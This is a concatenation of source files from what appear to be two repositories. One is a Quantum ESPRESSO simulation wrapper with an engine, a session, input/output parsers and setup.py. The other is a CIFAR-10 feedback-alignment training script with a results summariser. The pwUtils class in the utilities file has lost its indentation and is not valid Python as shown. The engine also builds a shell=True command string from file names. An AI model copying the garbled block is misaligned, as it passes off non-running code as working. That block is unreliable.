            command = [self._session._command_type, "-i", input_file, ">", output_file]
            try:
                subprocess.run(" ".join(command), capture_output = True, shell = True)
                print(" ".join(command))
            except OSError as error:
                # Narrowed from a bare "except:" so programming errors and
                # KeyboardInterrupt are no longer silently converted.
                raise RuntimeError(
                    f"An error occurred when running the following command: {command}"
                ) from error
--- FILE SEPARATOR ---
from osp.core.session import SimWrapperSession
from osp.core.namespaces import QE
from osp.wrappers.quantumespresso.qe_engine import SimulationEngine
from osp.wrappers.quantumespresso.qe_utils import qeUtils
import osp.wrappers.quantumespresso.qe_utils
from osp.core.utils import simple_search
class qeSession(SimWrapperSession):
    """Session that translates a CUDS simulation into Quantum ESPRESSO input
    files, runs the executable via SimulationEngine, and reads results back."""
    def __init__(self, engine = None, **kwargs):
        """Create the session, defaulting to a SimulationEngine bound to it."""
        # Engine and file utils
        engine = engine or SimulationEngine(self)
        super().__init__(engine, **kwargs)
    def __str__(self):
        return "Quantum Espresso Wrapper Session"
    def _run(self, simulation, prefix, command_type, calculation_type = "", root = "", **kwargs):
        """Write the input file for `command_type`, run it, and update the CUDS tree.

        Args:
            simulation: QE.Simulation (or list of them, for aggregating commands).
            prefix (str): file-name prefix, e.g. "si".
            command_type (str): executable name, e.g. "pw.x"; its stem selects
                the matching utils class (pw.x -> pwUtils).
            calculation_type: embedded in the generated file names and input.
            root (str): directory prefix for generated files.
            **kwargs: namelist overrides forwarded to the utils class.
        """
        # Selects e.g. pwUtils for "pw.x" by stripping the trailing ".x".
        self._qe_utils = getattr(osp.wrappers.quantumespresso.qe_utils, f"{command_type[:-2]}Utils")(self, root = root)
        self._prefix = prefix
        self._command_type = command_type
        self._calculation_type = calculation_type
        # Sets input and output files, e.g. "si.pwscf.in" / "si.pwscf.out"
        self._input_file = f"{self._prefix}.{self._command_type[:-2]}{self._calculation_type}.in"
        self._output_file = f"{self._prefix}.{self._command_type[:-2]}{self._calculation_type}.out"
        # Creates input, runs, and updates the cuds structure
        self._qe_utils._create_input(simulation, **kwargs)
        self._engine.run()
        self._qe_utils._update_cuds(simulation)
    # Only here for compatibility reasons
    def _load_from_backend(self, uids, expired=None):
        """Yield the registry object for each uid, or None when unknown."""
        for uid in uids:
            try:
                yield self._registry.get(uid)
            except KeyError:
                yield None
    def _apply_added(self, root_obj, buffer):
        return super()._apply_added(root_obj, buffer)
    def _apply_deleted(self, root_obj, buffer):
        return super()._apply_deleted(root_obj, buffer)
    def _apply_updated(self, root_obj, buffer):
        return super()._apply_updated(root_obj, buffer)
--- FILE SEPARATOR ---
from osp.core.namespaces import QE
from osp.core.utils import simple_search
import numpy as np
class qeUtils():
    """Utilities for reading and writing .in and .out files"""

    def __init__(self, session, root):
        """__init__ function for using any of the following utils

        Args:
            session (cuds object): the simulation CUDS object
            root (str): path prefix prepended to input/output file names
        """
        self._session = session
        self._file_path_root = root
        # Namelist parameters, e.g. {"CONTROL": {"calculation": "scf"}}.
        self.params = {}

    def _modify_input(self, sim, **kwargs):
        """Overlay user-supplied namelist settings onto self.params.

        Only namelists already present in self.params are updated; unknown
        keys in kwargs are ignored (same behavior as before, but via direct
        lookup instead of a quadratic double loop).
        """
        for namelist, overrides in kwargs.items():
            if namelist in self.params:
                self.params[namelist].update(overrides)

    def _create_input(self, sim, **kwargs):
        """Creates input file(s) necessary to perform the calculations

        Args:
            sim (QE.Simulation or list of QE.Simulations): the simulation on which to perform the calculation.
                For calculations that require multiple simulations and aggregate the data (such as ev.x), please provide a list of strings.
            **kwargs (dict): used to update the params
        """
        # Writes to file based on params and sysinfo
        with open(self._file_path_root + self._session._input_file, "w+") as f:
            for namelist, settings in self.params.items():
                f.write(f"&{namelist} \n")
                for key, value in settings.items():
                    # Numbers and fortran booleans are written bare; everything
                    # else is quoted as a fortran string. type(...) is checked
                    # exactly (not isinstance) so bools are not treated as ints.
                    if type(value) in (int, float) or value in (".true.", ".false."):
                        f.write(f"  {key} = {value} \n")
                    else:
                        f.write(f"  {key} = '{value}' \n")
                f.write("/\n")
            if self._session._command_type in ("pw.x", "ph.x"):  # TODO: find a way to put this in the pwUtils class
                for card, rows in self.sysinfo.items():
                    f.write(f"{card} ")
                    for row in rows:
                        f.write(" ".join(str(v) for v in row) + "\n")

    def _update_cuds(self, sim):
        """Based off of the structure

        Args:
            sim (QE.Simulation or list of QE.Simulations): the simulation for which cuds should be updated.
                For calculations that require multiple simulations and aggregate the data (such as ev.x), please provide a list of strings.
        """
        # Adds the output file that comes standard with most commands to the structure.
        sim.add(QE.Outfile(path = self._file_path_root + self._session._output_file))
class pwUtils(qeUtils):
def _create_input(self, sim, **kwargs):
# Simulation parameters
self.params = {
"CONTROL": {
"calculation": f"{self._session._calculation_type}",
"pseudo_dir": ".",
"tprnfor": ".true.",
"tstress": ".true.",
"prefix": f"{self._session._prefix}",
},
"SYSTEM": {
"ibrav": 0,
"ecutwfc": 100,
},
"ELECTRONS": {},
"CELL": {},
"IONS": {}
}
# Information about the system to be simulated
self.sysinfo = {"ATOMIC_SPECIES":[[""]], "ATOMIC_POSITIONS":[["{crystal}"]],"K_POINTS":[["{automatic}"]]}
# Defining a couple useful functions
def _get_count(oclass):
count = 0
for i in simple_search.find_cuds_objects_by_oclass(oclass = oclass, root = sim, rel = QE.HAS_PART):
count +=1
return count
def findo(oclass, depth):
return simple_search.find_cuds_objects_by_oclass(oclass = oclass, root = sim, rel = QE.HAS_PART)
# Add some sysinfo based on cuds
self.params["SYSTEM"]["nat"] = _get_count(oclass = QE.Atom)
self.params["SYSTEM"]["ntyp"] = _get_count(QE.Element)
self.params["SYSTEM"]["celldm(1)"] = float(findo(QE.Celldm1, 2)[0].value)
print(type(self.params["SYSTEM"]["celldm(1)"]))
# Storing atoms so that the same order can be used to update cuds later on
self.atomlist = []
# Adds a bunch of stuff to sysinfo
for element in findo(QE.Element, 1):
self.sysinfo["ATOMIC_SPECIES"].append([element.name, element.get(oclass = QE.Mass)[0].value, element.get(oclass = QE.PSEUDOPOTENTIAL)[0].path])
for atom in findo(QE.Atom, 3):
self.atomlist.append(atom)
self.sysinfo["ATOMIC_POSITIONS"].append([atom.get(oclass = QE.Element, rel = QE.IS_PART_OF)[0].name] + [i for i in atom.get(oclass = QE.Position)[0].vector])
if findo(QE.K_POINTS, 2):
point = findo(QE.K_POINTS, 1)[0]
self.sysinfo["K_POINTS"].append([int(i) for i in point.vector6])
elif findo(QE.K_POINT, 2):
count = 0
for point in findo(QE.K_POINT, 1):
count +=1
self.sysinfo["K_POINTS"].append([i for i in point.vector] + [point.value])
self.sysinfo["K_POINTS"].insert(1, count)
if self.params["SYSTEM"]["ibrav"] == 0:
self.sysinfo["CELL_PARAMETERS"]=[["{alat}"]]
cellparams = findo(QE.CellParams, 2)[0]
for i in cellparams.tensor2:
self.sysinfo["CELL_PARAMETERS"].append([float(j) for j in i])
# Inherits method
super()._modify_input(sim, **kwargs)
super()._create_input(sim, **kwargs)
def _update_cuds(self, sim):
    """Parse the pw.x output file and write the results back into CUDS.

    Small helper closures each recognise one marker line of the output and
    update (or create) the matching entity on ``sim``.  Which helpers run
    depends on the session's calculation type ("scf", "relax", "vc-relax").
    The helpers close over ``lines`` and ``i`` from the parsing loops below.
    """
    def update_total_energy(line):
        # The converged total energy is printed on the line starting with "!".
        if line.startswith("!"):
            total_energy = float(line.split()[4])
            cuds_entity = sim.get(oclass = QE.TotalEnergy)
            if cuds_entity:
                cuds_entity[0].value = total_energy
                cuds_entity[0].unit = "Ry"
            else:
                sim.add(QE.TotalEnergy(value = total_energy, unit = "Ry"))

    def update_pressure(line):
        # The pressure line's offset after the "Computing" marker differs
        # between output variants, hence the two candidate lines.
        if line.startswith(" Computing"):
            try:
                pressure = float(lines[i+2].split()[5])
            except (IndexError, ValueError):
                pressure = float(lines[i+4].split()[5])
            cuds_entity = sim.get(oclass = QE.Pressure)
            if cuds_entity:
                cuds_entity[0].value = pressure
                cuds_entity[0].unit = "kbar"
            else:
                sim.add(QE.Pressure(value = pressure, unit = "kbar"))

    def update_force(line):
        # Per-atom force; atoms are matched by their 1-based output index.
        if line.startswith(" atom "):
            atom = self.atomlist[int(line.split()[1])-1]
            force = [float(line.split()[j]) for j in range(6, 9)]
            cuds_entity = atom.get(oclass = QE.Force)
            if cuds_entity:
                cuds_entity[0].vector = force
                cuds_entity[0].unit = "N"
            else:
                atom.add(QE.Force(vector = force, unit = "N"))

    def update_stress_tensor(i, line):
        if line.startswith(" Computing"):
            # The three tensor rows start 3 (or 5) lines after the marker.
            try:
                stresslines = [lines[i+j] for j in range(3, 6)]
                raw_stress_tensor = [float(j) for j in "".join(stresslines).split()]
            except (IndexError, ValueError):
                stresslines = [lines[i+j] for j in range(5, 8)]
                raw_stress_tensor = [float(j) for j in "".join(stresslines).split()]
            # Keep the last three columns of each row (kbar, per the name).
            stress_tensor_kbar = np.array(raw_stress_tensor).reshape((3, 6))[:,3:6]
            cuds_entity = sim.get(oclass = QE.StressTensor)
            if cuds_entity:
                cuds_entity[0].tensor2 = stress_tensor_kbar
                cuds_entity[0].unit = "kbar"
            else:
                sim.add(QE.StressTensor(tensor2 = stress_tensor_kbar, unit = "kbar"))

    def update_atomic_positions(i, line):
        if line.startswith("Begin"):
            positionslines = [lines[i+j] for j in range(3, 3+len(self.atomlist))]
            for j, posline in enumerate(positionslines):
                atom = self.atomlist[j]
                position = [float(posline.split()[k]) for k in range(1, 4)]
                cuds_entity = atom.get(oclass = QE.Position)
                cuds_entity[0].vector = position
                # NOTE(review): "kbar" looks like a copy-paste slip — a
                # position is not a pressure; confirm the intended unit.
                cuds_entity[0].unit = "kbar"

    def update_celldm1(line):
        # celldm(1) (alat) appears on the CELL_PARAMETERS header line.
        if line.startswith("CELL_PARAMETERS"):
            celldm1 = float(line.split()[2][:-1])
            cuds_entity = sim.get(oclass = QE.Cell)[0].get(oclass = QE.Celldm1)
            cuds_entity[0].value = celldm1
            cuds_entity[0].unit = "au"

    def update_cell_params(i, line):
        if line.startswith("CELL_PARAMETERS"):
            paramlines = [lines[i+j] for j in range(1, 4)]
            # BUG FIX: the Cell entity was looked up twice
            # (.get(QE.Cell)[0].get(QE.Cell)[0]); CellParams hangs directly
            # off the Cell, as in update_celldm1 above.
            cuds_entity = sim.get(oclass = QE.Cell)[0].get(oclass = QE.CellParams)[0]
            cuds_entity.get(oclass = QE.CellParameterX)[0].vector = [float(k) for k in paramlines[0].split()]
            cuds_entity.get(oclass = QE.CellParameterY)[0].vector = [float(k) for k in paramlines[1].split()]
            cuds_entity.get(oclass = QE.CellParameterZ)[0].vector = [float(k) for k in paramlines[2].split()]

    def update_volume(line):
        if line.startswith(" unit-cell volume"):
            volume = float(line.split()[3])
            cuds_entity = sim.get(oclass = QE.Cell)[0].get(oclass = QE.Volume)
            if cuds_entity:
                cuds_entity[0].value = volume
                cuds_entity[0].unit = "au^3"
            else:
                sim.get(oclass = QE.Cell)[0].add(QE.Volume(value = volume, unit = "au^3"))

    # Run the updates appropriate for the calculation type.
    if self._session._calculation_type == "scf":
        with open(self._file_path_root + self._session._output_file, "r+") as file:
            lines = file.readlines()
            for i, line in enumerate(lines):
                update_total_energy(line)
                update_pressure(line)
                update_force(line)
                update_stress_tensor(i, line)
                update_volume(line)
    if self._session._calculation_type == "relax":
        with open(self._file_path_root + self._session._output_file, "r+") as file:
            lines = file.readlines()
            for i, line in enumerate(lines):
                update_total_energy(line)
                update_pressure(line)
                update_force(line)
                update_stress_tensor(i, line)
                update_atomic_positions(i, line)
                update_volume(line)
    if self._session._calculation_type == "vc-relax":
        with open(self._file_path_root + self._session._output_file, "r+") as file:
            lines = file.readlines()
            for i, line in enumerate(lines):
                # BUG FIX: these two were called with the whole `lines` list
                # instead of the current line, so they never matched anything.
                update_total_energy(line)
                update_pressure(line)
                update_force(line)
                update_stress_tensor(i, line)
                update_atomic_positions(i, line)
                # BUG FIX: update_celldm1 takes only the line; the old call
                # update_celldm1(i, line) raised TypeError. update_cell_params
                # was defined but never invoked — call it here as well.
                update_celldm1(line)
                update_cell_params(i, line)
                update_volume(line)
    # Inherits method
    super()._update_cuds(sim)
class bandsUtils(qeUtils):
    """Utility class for the bands.x post-processing executable."""

    def _create_input(self, sim, **kwargs):
        """Build the default &BANDS namelist and write the bands.x input file."""
        prefix = self._session._prefix
        self.params = {
            "BANDS": {
                "prefix": prefix,
                "outdir": ".",
                "filband": prefix + ".bands.dat"
            }
        }
        # bands.x has no calculation type of its own.
        self._session._calculation_type = ""
        self.sysinfo = []
        super()._modify_input(sim, **kwargs)
        super()._create_input(sim, **kwargs)

    def _update_cuds(self, sim):
        """Attach the produced .bands.dat file to the simulation CUDS."""
        bands_path = self._file_path_root + self._session._prefix + ".bands.dat"
        sim.add(QE.BandsDat(path = bands_path))
        super()._update_cuds(sim)
class dosUtils(qeUtils):
    """Utility class for the dos.x post-processing executable."""

    def _create_input(self, sim, **kwargs):
        """Build the default &DOS namelist and write the dos.x input file."""
        prefix = self._session._prefix
        self.params = {
            "DOS": {
                "outdir": ".",
                "prefix": prefix,
                "DeltaE": 0.05,
                "fildos": prefix + ".dos.dat"
            }
        }
        super()._modify_input(sim, **kwargs)
        super()._create_input(sim, **kwargs)

    def _update_cuds(self, sim):
        """Attach the produced .dos.dat file to the simulation CUDS."""
        dos_path = self._file_path_root + self._session._prefix + ".dos.dat"
        sim.add(QE.DosDat(path = dos_path))
        super()._update_cuds(sim)
class ppUtils(qeUtils):
    """Utility class for the pp.x post-processing executable."""

    def _create_input(self, sim, **kwargs):
        """Build the &INPUTPP/&PLOT namelists and write the pp.x input file."""
        self.params = {
            "INPUTPP": {
                "prefix": f"{self._session._prefix}",
                "outdir": ".",
                "filplot": f"{self._session._prefix}.pp{self._session._calculation_type}.txt",
                # Note that plot_num is strictly int, reference to the significance of each values can be found here: https://www.quantum-espresso.org/Doc/INPUT_PP.html
                # We use calculation type because it is already in use
                "plot_num": self._session._calculation_type
            },
            "PLOT": {
                "iflag": 3,
                "output_format": 3,
                "fileout": f"{self._session._prefix}{self._session._calculation_type}.pp.xsf",
                # TODO: add support for manual vectors here
                # TODO: add support for variable output formats
            }
        }
        super()._modify_input(sim, **kwargs)
        plot = self.params["PLOT"]
        # Default plot geometry: iflag selects 1D/2D/3D/spherical plots; each
        # extra dimension needs one more spanning vector e1/e2/e3 + grid size.
        if plot["iflag"] != 4:
            plot[f"e1 ({1})"] = 1
            plot[f"e1 ({2})"] = 0
            plot[f"e1 ({3})"] = 0
            for i in range(1, 4):
                plot[f"x0 ({i})"] = 0
            plot["nx"] = 101
        # BUG FIX: `iflag == (2 or 3)` only compared against 2, because
        # `(2 or 3)` evaluates to 2. Use a membership test instead.
        if plot["iflag"] in (2, 3):
            plot[f"e2 ({1})"] = 0
            plot[f"e2 ({2})"] = 1
            plot[f"e2 ({3})"] = 0
            plot["ny"] = 101
        if plot["iflag"] == 3:
            plot[f"e3 ({1})"] = 0
            plot[f"e3 ({2})"] = 0
            plot[f"e3 ({3})"] = 1
            plot["nz"] = 101
        if plot["iflag"] == 4:
            # BUG FIX: `==` was used instead of `=`, so radius was never set.
            plot["radius"] = 1
            plot["nx"] = 101
            plot["ny"] = 101
        # Adjust the output-file extension to the chosen output format.
        # BUG FIX: `== (0 or 7)` only matched 7; use a membership test.
        if plot["output_format"] in (0, 7):
            plot["fileout"] = plot["fileout"][:-4] + "plt"
        # BUG FIX: both elif branches tested 6, so the cube branch was dead
        # code; plotrho-format output is output_format 2 per INPUT_PP.
        elif plot["output_format"] == 2:
            plot["fileout"] = plot["fileout"][:-4] + "pltrho"
        elif plot["output_format"] == 6:
            plot["fileout"] = plot["fileout"][:-4] + "cub"
        super()._create_input(sim, **kwargs)

    def _update_cuds(self, sim):
        """Register the produced .pp.xsf file on the simulation CUDS."""
        sim.add(QE.XSF(path = self._file_path_root + self._session._prefix + ".pp.xsf"))
        super()._update_cuds(sim)
class phUtils(qeUtils):
    """Utility class for the ph.x phonon executable."""

    def _create_input(self, sim, **kwargs):
        """Build the &INPUTPH namelist and, if needed, the explicit q-point card."""
        self.params = {
            "INPUTPH": {
                "outdir": ".",
                "prefix": f"{self._session._prefix}",
                "fildyn": f"{self._session._prefix}.ph.dyn"
            }
        }
        # Only q points explicitly flagged for calculation are considered.
        self.qpoints = []
        for point in sim.get(oclass = QE.QPoint):
            if point.calculate == True:
                self.qpoints.append(point)
        # Unless a dispersion (ldisp) or q-point list (qplot) run is requested,
        # ph.x expects a single explicit q-point line after the namelist.
        # BUG FIX: the flags live under "INPUTPH"; the old lookup on
        # self.params["ldisp"] always raised KeyError and the bare except
        # silently skipped writing the Gamma-point card.
        # NOTE(review): user kwargs are merged below in _modify_input, after
        # this check — ldisp/qplot passed via kwargs are not seen here;
        # confirm the intended ordering.
        inputph = self.params["INPUTPH"]
        if inputph.get("ldisp") != ".true." and inputph.get("qplot") != ".true.":
            self.sysinfo = {
                "": [["0 0 0"]]
                # TODO: manual q point
                # TODO: add support for multiple q points
            }
        else:
            self.sysinfo = {}
        super()._modify_input(sim, **kwargs)
        super()._create_input(sim, **kwargs)

    def _update_cuds(self, sim):
        """Read mode frequencies for the first q point from the ph.x output."""
        sim.add(QE.PhOut(path = self._file_path_root + self._session._output_file))
        with open(self._file_path_root + self._session._output_file, 'r') as file:
            lines = file.readlines()
        # Frequencies are printed between two "****" separator lines.
        beginend = []
        for i, line in enumerate(lines):
            if line.startswith(" ****"):
                beginend.append(i)
        # NOTE(review): only the first flagged q point is updated — extend to
        # multiple q points when multi-q support lands.
        q_point = self.qpoints[0]
        for i in range(beginend[0]+1, beginend[1]):
            freq = float(lines[i].split()[4])
            modenum = int(lines[i].split()[2][:-1])
            unit = lines[i].split()[5][1:-1]
            for mode in q_point.get(oclass = QE.Mode):
                if mode.number == modenum:
                    if mode.get(oclass = QE.Frequency):
                        mode.get(oclass = QE.Frequency)[0].value = freq
                        mode.get(oclass = QE.Frequency)[0].unit = unit
                    else:
                        mode.add(QE.Frequency(value = freq, unit = unit))
        super()._update_cuds(sim)
class cliUtils(qeUtils):
    """Base class for wrappers around interactive command-line tools."""

    def _modify_input(self, sim, **kwargs):
        """Merge every keyword argument's mapping into the parameter dict."""
        for mapping in kwargs.values():
            self.params.update(mapping)

    def _update_cuds(self, sim):
        """CLI tools perform no CUDS updates by default."""
        pass
class plotbandUtils(cliUtils):
    """Wrapper for the interactive plotband.x tool."""

    def _create_input(self, sim, **kwargs):
        """Default answers, in prompt order, for plotband.x's interactive session."""
        prompts = ("Input file", "Emin, Emax", "gnuplot", "ps", "Efermi", "deltaE")
        self.params = {prompt: str(answer) for answer, prompt in enumerate(prompts, start=1)}
        super()._modify_input(sim, **kwargs)

    def _update_cuds(self, sim):
        """plotband.x produces no CUDS updates."""
        pass
class evUtils(cliUtils):
    """Utility class for the ev.x equation-of-state fitting tool."""

    def _create_input(self, sims, **kwargs):
        """Write one "volume energy" line per simulation and set the CLI answers.

        ``sims`` is an iterable of simulation CUDS objects, each carrying a
        TotalEnergy and a Volume entity reachable via HAS_PART.
        """
        with open(self._file_path_root + self._session._input_file, "w+") as f:
            for s in sims:
                total_energy = simple_search.find_cuds_objects_by_oclass(oclass = QE.TotalEnergy, root = s, rel = QE.HAS_PART)[0].value
                volume = simple_search.find_cuds_objects_by_oclass(oclass = QE.Volume, root = s, rel = QE.HAS_PART)[0].value
                f.write(f"{volume} {total_energy}\n")
        # Ordered answers to ev.x's interactive prompts.
        self.params = {
            "Lattice parameter": "au",
            "type": "noncubic",
            "equation of state": self._session._calculation_type,
            "Input": self._file_path_root + self._session._input_file,
            "Output": self._file_path_root + self._session._output_file,
        }
        # BUG FIX: was `sim`, which is undefined in this scope (NameError).
        super()._modify_input(sims, **kwargs)

    def _update_cuds(self, sims):
        """Update equilibrium volume and bulk modulus on every simulation."""
        with open(self._file_path_root + self._session._output_file, 'r') as file:
            lines = file.readlines()
        v0 = lines[1].split()[3]
        b0 = lines[1].split()[6][1:]
        for s in sims:
            volume_entity = s.get(oclass = QE.Cell)[0].get(oclass = QE.EquilibriumVolume)
            modulus_entity = s.get(oclass = QE.BulkModulus)
            if volume_entity:
                volume_entity[0].value = float(v0)
                volume_entity[0].unit = "au^3"
            else:
                # Store as float, consistent with the update branch above.
                s.get(oclass = QE.Cell)[0].add(QE.EquilibriumVolume(value = float(v0), unit = "au^3"))
            if modulus_entity:
                modulus_entity[0].value = float(b0)
                # BUG FIX: the unit was written to volume_entity, clobbering
                # the equilibrium-volume unit with "kbar".
                modulus_entity[0].unit = "kbar"
            else:
                s.add(QE.BulkModulus(value = float(b0), unit = "kbar"))
# class alpha2fUtils(qeUtils):
# def _create_input(self, sim, **kwargs):
# self.params = {
# "INPUTPH": {
# "outdir": "'.'",
# "prefix": f"'{self._session._prefix}'",
# "fildyn": f"'{self._session._prefix}.ph.dyn'"
# },
# "INPUTa2F": {
# "nfreq": 500
# }
# }
# super()._modify_input(sim, **kwargs)
# super()._create_input(sim, **kwargs)
# def _update_cuds(self, sim):
# sim.add(QE.A2fDat)
# super()._update_cuds(sim)
# # class epaUtils(qeUtils):
# # def _create_input(self, sim, **kwargs):
# # with open(self._file_path_root + self._session._input_file, "w+") as file:
# class dynmatUtils(qeUtils):
# def _create_input(self, sim, **kwargs):
# super()._modify_input(sim, **kwargs)
# super()._create_input(sim, **kwargs)
--- FILE SEPARATOR ---
from setuptools import setup, find_packages

# Read the long description for the package from the project README.
with open('README.md', 'r') as readme:
    README_TEXT = readme.read()

# Main setup configuration: packages the SimPhoNy wrapper for Quantum
# Espresso and registers it in the 'wrappers' entry-point group so that
# osp-core can discover the QESession class.
setup(
    name = 'quantum-espresso',
    version = '1.0',
    author = 'Materials Informatics team, Fraunhofer IWM',
    description = 'Simulation wrapper for Quantum Espresso/SimPhoNy',
    long_description = README_TEXT,
    packages = find_packages(),
    test_suite = 'tests',
    entry_points={
        'wrappers':
        'quantumespresso = osp.wrappers.quantumespresso:QESession'
    },
    install_requires = ['osp-core>=3.4.0']
)
|
[
"/examples/Si_simple.py",
"/examples/pw_short_example.py",
"/examples/pw_short_example_osp.py",
"/osp/wrappers/quantumespresso/qe_engine.py",
"/osp/wrappers/quantumespresso/qe_session.py",
"/osp/wrappers/quantumespresso/qe_utils.py",
"/setup.py"
] |
00mjk/ssdfa
|
import argparse
import os
import sys
##############################################
# Command-line configuration, driven from one (flag, type, default) table.
parser = argparse.ArgumentParser()
_ARG_SPECS = (
    ('--epochs', int, 100),
    ('--batch_size', int, 64),
    ('--lr', float, 1e-4),
    ('--eps', float, 1e-5),
    ('--dropout', float, 0.5),
    ('--act', str, 'relu'),
    ('--bias', float, 0.),
    ('--gpu', int, 0),
    ('--dfa', int, 0),
    ('--sparse', int, 0),
    ('--rank', int, 0),
    ('--init', str, "glorot_uniform"),
    ('--save', int, 0),
    ('--name', str, "cifar10_fc"),
    ('--load', str, None),
)
for _flag, _type, _default in _ARG_SPECS:
    parser.add_argument(_flag, type=_type, default=_default)
args = parser.parse_args()
# Pin the process to the requested GPU before TensorFlow is imported.
if args.gpu >= 0:
    os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
    os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu)
##############################################
import tensorflow as tf
import keras
import numpy as np
from lib.Model import Model
from lib.Layer import Layer
from lib.ConvToFullyConnected import ConvToFullyConnected
from lib.FullyConnected import FullyConnected
from lib.Convolution import Convolution
from lib.MaxPool import MaxPool
from lib.Dropout import Dropout
from lib.FeedbackFC import FeedbackFC
from lib.FeedbackConv import FeedbackConv
from lib.Activation import Relu
from lib.Activation import Tanh
##############################################
# Load CIFAR-10 and one-hot encode the labels; images are standardised per
# pixel position (zero mean, unit variance computed over the dataset axis).
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.cifar10.load_data()
train_examples = 50000
test_examples = 10000
# Sanity-check the expected CIFAR-10 shapes before preprocessing.
assert(np.shape(x_train) == (train_examples, 32, 32, 3))
x_train = x_train - np.mean(x_train, axis=0, keepdims=True)
x_train = x_train / np.std(x_train, axis=0, keepdims=True)
y_train = keras.utils.to_categorical(y_train, 10)
assert(np.shape(x_test) == (test_examples, 32, 32, 3))
# NOTE(review): the test set is standardised with its own statistics rather
# than the training-set statistics — confirm this is intended.
x_test = x_test - np.mean(x_test, axis=0, keepdims=True)
x_test = x_test / np.std(x_test, axis=0, keepdims=True)
y_test = keras.utils.to_categorical(y_test, 10)
##############################################
# Pick the hidden-layer activation; anything other than 'tanh' or 'relu'
# is rejected outright.
if args.act == 'relu':
    act = Relu()
elif args.act == 'tanh':
    act = Tanh()
else:
    assert(False)
##############################################
# Build the TF1 static graph with a fixed seed for reproducibility.
tf.set_random_seed(0)
tf.reset_default_graph()
# Per-step feeds: effective batch size, dropout rate and learning rate.
batch_size = tf.placeholder(tf.int32, shape=())
dropout_rate = tf.placeholder(tf.float32, shape=())
lr = tf.placeholder(tf.float32, shape=())
X = tf.placeholder(tf.float32, [None, 32, 32, 3])
Y = tf.placeholder(tf.float32, [None, 10])
# Fully-connected stack 3072 -> 1000 -> 1000 -> 1000 -> 10 with dropout in
# between; the FeedbackFC layers carry the fixed feedback weights used by
# the --dfa training path.
l0 = ConvToFullyConnected(input_shape=[32, 32, 3])
l1 = Dropout(rate=0.1)
l2 = FullyConnected(input_shape=3072, size=1000, init=args.init, activation=act, bias=args.bias, name='fc1')
l3 = Dropout(rate=dropout_rate)
l4 = FeedbackFC(size=[3072, 1000], num_classes=10, sparse=args.sparse, rank=args.rank, name='fc1_fb')
l5 = FullyConnected(input_shape=1000, size=1000, init=args.init, activation=act, bias=args.bias, name='fc2')
l6 = Dropout(rate=dropout_rate)
l7 = FeedbackFC(size=[1000, 1000], num_classes=10, sparse=args.sparse, rank=args.rank, name='fc2_fb')
l8 = FullyConnected(input_shape=1000, size=1000, init=args.init, activation=act, bias=args.bias, name='fc3')
l9 = Dropout(rate=dropout_rate)
l10 = FeedbackFC(size=[1000, 1000], num_classes=10, sparse=args.sparse, rank=args.rank, name='fc3_fb')
l11 = FullyConnected(input_shape=1000, size=10, init=args.init, bias=args.bias, name='fc4')
##############################################
# Assemble the model, choose backprop or DFA gradients, build the train op
# and the count of correct top-1 predictions per batch.
model = Model(layers=[l0, l1, l2, l3, l4, l5, l6, l7, l8, l9, l10, l11])
predict = model.predict(X=X)
weights = model.get_weights()
if args.dfa:
    grads_and_vars = model.dfa_gvs(X=X, Y=Y)
else:
    grads_and_vars = model.gvs(X=X, Y=Y)
train = tf.train.AdamOptimizer(learning_rate=lr, epsilon=args.eps).apply_gradients(grads_and_vars=grads_and_vars)
correct = tf.equal(tf.argmax(predict,1), tf.argmax(Y,1))
total_correct = tf.reduce_sum(tf.cast(correct, tf.float32))
##############################################
# Interactive session plus variable initialisation.
sess = tf.InteractiveSession()
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
##############################################
# Create the results log, recording the run name and the parameter count.
filename = args.name + '.results'
# Use a context manager so the handle is closed even if a write fails
# (the original open/close pair leaked the handle on error).
with open(filename, "w") as f:
    f.write(filename + "\n")
    f.write("total params: " + str(model.num_params()) + "\n")
##############################################
# Epoch loop: one full pass over the training data, then one over the test
# data; per-epoch accuracies are appended to the results file.
train_accs = []
test_accs = []
for ii in range(args.epochs):
    #############################
    # Training pass (the final batch is truncated, not skipped).
    _total_correct = 0
    for jj in range(0, train_examples, args.batch_size):
        s = jj
        e = min(jj + args.batch_size, train_examples)
        b = e - s
        xs = x_train[s:e]
        ys = y_train[s:e]
        _correct, _ = sess.run([total_correct, train], feed_dict={batch_size: b, dropout_rate: args.dropout, lr: args.lr, X: xs, Y: ys})
        _total_correct += _correct
    # BUG FIX: every example is evaluated above (the last batch is truncated
    # via min(), not dropped), but the old denominator excluded the
    # remainder — which could report accuracies above 1.0.
    train_acc = 1.0 * _total_correct / train_examples
    train_accs.append(train_acc)
    #############################
    # Evaluation pass: dropout off, learning rate fed but unused.
    _total_correct = 0
    for jj in range(0, test_examples, args.batch_size):
        s = jj
        e = min(jj + args.batch_size, test_examples)
        b = e - s
        xs = x_test[s:e]
        ys = y_test[s:e]
        _correct = sess.run(total_correct, feed_dict={batch_size: b, dropout_rate: 0.0, lr: 0.0, X: xs, Y: ys})
        _total_correct += _correct
    # BUG FIX: same denominator correction as for the training accuracy.
    test_acc = 1.0 * _total_correct / test_examples
    test_accs.append(test_acc)
    #############################
    # Log per-epoch accuracies to stdout and to the results file.
    p = "%d | train acc: %f | test acc: %f" % (ii, train_acc, test_acc)
    print (p)
    with open(filename, "a") as f:
        f.write(p + "\n")
##############################################
# Optionally persist the trained weights together with the accuracy curves.
if args.save:
    w = sess.run(weights)
    w.update({'train_acc': train_accs, 'test_acc': test_accs})
    np.save(args.name, w)
##############################################
--- FILE SEPARATOR ---
import numpy as np
import os
import copy
import threading
import argparse
from results import get_runs
##############################################
runs = get_runs()
##############################################
# For each (benchmark, dfa, sparse) combination, keep the hyper-parameter
# setting that reached the best test accuracy across all runs.
results = {}
for param in runs:
    # Result files are named from the run's hyper-parameters.
    name = '%s_%f_%f_%s_%f_%f_%d_%d_%s.npy' % (param['benchmark'],
                                               param['lr'],
                                               param['eps'],
                                               param['act'],
                                               param['bias'],
                                               param['dropout'],
                                               param['dfa'],
                                               param['sparse'],
                                               param['init'])
    res = np.load(name, allow_pickle=True).item()
    key = (param['benchmark'], param['dfa'], param['sparse'])
    val = max(res['test_acc'])
    print (name, val)
    # Merged the two duplicated branches: store when the key is new
    # or the new value is an improvement.
    if key not in results or results[key][0] < val:
        results[key] = (val, param['benchmark'], param['lr'], param['eps'], param['act'], param['bias'], param['dfa'], param['sparse'], param['init'], name)
for key in sorted(results.keys()):
    print (key, results[key])
--- FILE SEPARATOR ---
import argparse
